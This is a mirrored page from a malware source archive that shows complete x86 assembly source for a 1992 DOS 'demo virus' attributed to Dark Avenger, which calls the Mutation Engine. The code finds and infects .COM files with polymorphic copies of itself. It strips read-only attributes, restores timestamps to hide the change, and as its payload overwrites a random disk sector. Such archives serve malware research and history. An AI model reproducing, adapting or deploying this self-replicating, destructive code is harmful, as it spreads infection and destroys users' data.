mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
177 lines
2.9 KiB
NASM
177 lines
2.9 KiB
NASM
|
|
||
|
; This is a demo virus to demonstrate
|
||
|
; the Mutation Engine <tm> usage
|
||
|
|
||
|
; Version 1.01 (1-3-92)
|
||
|
; (C) 1992 Dark Avenger.
|
||
|
|
||
|
.model tiny
|
||
|
.radix 16
|
||
|
.code
|
||
|
|
||
|
extrn mut_engine: near, rnd_get: near, rnd_init: near
|
||
|
extrn rnd_buf: word, data_top: near
|
||
|
|
||
|
org 100
|
||
|
|
||
|
start:
|
||
|
call locadr
|
||
|
reladr:
|
||
|
db 'Just a simple demo...'
|
||
|
locadr:
|
||
|
pop dx
|
||
|
mov cl,4
|
||
|
shr dx,cl
|
||
|
mov cx,ds
|
||
|
add cx,dx ;Calculate new CS
|
||
|
mov dx,offset begin
|
||
|
push cx dx
|
||
|
retf
|
||
|
begin:
|
||
|
cld
|
||
|
mov di,offset start
|
||
|
push es di
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov si,offset old_cod
|
||
|
movsb ;Restore first 3 bytes
|
||
|
push ax
|
||
|
mov dx,offset dta_buf ;Set DTA
|
||
|
mov ah,1a
|
||
|
int 21
|
||
|
mov ax,3524 ;Hook INT 24
|
||
|
int 21
|
||
|
push es bx
|
||
|
mov dx,offset fail_err
|
||
|
mov ax,2524
|
||
|
int 21
|
||
|
xor ax,ax ;Initialize random seed
|
||
|
call rnd_init
|
||
|
push sp
|
||
|
pop cx
|
||
|
sub cx,sp
|
||
|
add cx,4
|
||
|
push cx
|
||
|
mov dx,offset srchnam
|
||
|
mov cl,3
|
||
|
mov ah,4e
|
||
|
find_lup:
|
||
|
int 21 ;Find the next COM file
|
||
|
jc infect_done
|
||
|
cmp [dta_buf+1a],ch
|
||
|
jnz infect ;If not infected, infect it now
|
||
|
find_nxt:
|
||
|
push cx
|
||
|
mov dx,offset dta_buf
|
||
|
mov ah,4f
|
||
|
jmp find_lup
|
||
|
infect_done:
|
||
|
pop cx
|
||
|
loop find_nxt
|
||
|
jnc damage_done
|
||
|
test al,1
|
||
|
jz damage_done
|
||
|
xchg ax,dx ;Trash a random sector on the default
|
||
|
mov ah,39 ; drive
|
||
|
int 21
|
||
|
mov cx,1
|
||
|
mov bx,offset start
|
||
|
int 26
|
||
|
popf
|
||
|
damage_done:
|
||
|
pop dx ds
|
||
|
mov ax,2524 ;Restore INT 24
|
||
|
int 21
|
||
|
pop ds
|
||
|
mov dx,80 ;Restore DTA
|
||
|
mov ah,1a
|
||
|
int 21
|
||
|
push ds ;Exit to program
|
||
|
pop es
|
||
|
pop ax
|
||
|
retf
|
||
|
infect:
|
||
|
xor cx,cx ;Reset read-only attribute
|
||
|
mov ax,4301
|
||
|
int 21
|
||
|
jc infect_done
|
||
|
mov ax,3d02 ;Open the file
|
||
|
int 21
|
||
|
jc infect_done
|
||
|
xchg ax,bx
|
||
|
mov dx,offset old_cod ;Read first 3 bytes
|
||
|
mov cx,3
|
||
|
mov ah,3f
|
||
|
int 21
|
||
|
jc read_done
|
||
|
mov ax,word ptr [old_cod] ;Make sure it's not an EXE file
|
||
|
cmp ax,'ZM'
|
||
|
jz read_done
|
||
|
cmp ax,'MZ'
|
||
|
jz read_done
|
||
|
xor cx,cx ;Seek at EOF
|
||
|
mov ax,4202
|
||
|
int 21
|
||
|
test dx,dx ;Make sure the file is not too big
|
||
|
jnz read_done
|
||
|
cmp ax,-2000
|
||
|
jnc read_done
|
||
|
mov bp,ax
|
||
|
sub ax,3
|
||
|
mov word ptr [new_cod+1],ax
|
||
|
mov ax,5700 ;Save file's date/time
|
||
|
int 21
|
||
|
push dx cx
|
||
|
mov ax,offset data_top+0f
|
||
|
mov cl,4 ;Now call the Engine
|
||
|
shr ax,cl
|
||
|
mov es,ax
|
||
|
mov dx,offset start
|
||
|
mov cx,offset _DATA
|
||
|
push bp bx
|
||
|
add bp,dx
|
||
|
xor si,si
|
||
|
mov ax,101
|
||
|
call mut_engine
|
||
|
pop bx ax
|
||
|
add ax,cx ;Make sure file length mod 256 = 0
|
||
|
neg ax
|
||
|
xor ah,ah
|
||
|
add cx,ax
|
||
|
push cs
|
||
|
pop ds
|
||
|
jc write_done
|
||
|
sub cx,ax
|
||
|
jnz write_done
|
||
|
mov dx,offset new_cod
|
||
|
mov cx,3
|
||
|
mov ah,40
|
||
|
int 21
|
||
|
write_done:
|
||
|
pop cx dx ;Restore file's date/time
|
||
|
mov ax,5701
|
||
|
int 21
|
||
|
read_done:
|
||
|
mov ah,3e ;Close the file
|
||
|
int 21
|
||
|
jmp infect_done
|
||
|
|
||
|
fail_err: ;Critical errors handler
|
||
|
mov al,3
|
||
|
iret
|
||
|
|
||
|
srchnam db '*.COM',0
|
||
|
|
||
|
old_cod: ;Buffer to read first 3 bytes
|
||
|
ret
|
||
|
dw ?
|
||
|
|
||
|
new_cod: ;Buffer to write first 3 bytes
|
||
|
jmp $+100
|
||
|
|
||
|
.data
|
||
|
|
||
|
dta_buf db 2bh dup(?) ;Buffer for DTA
|
||
|
|
||
|
end start
|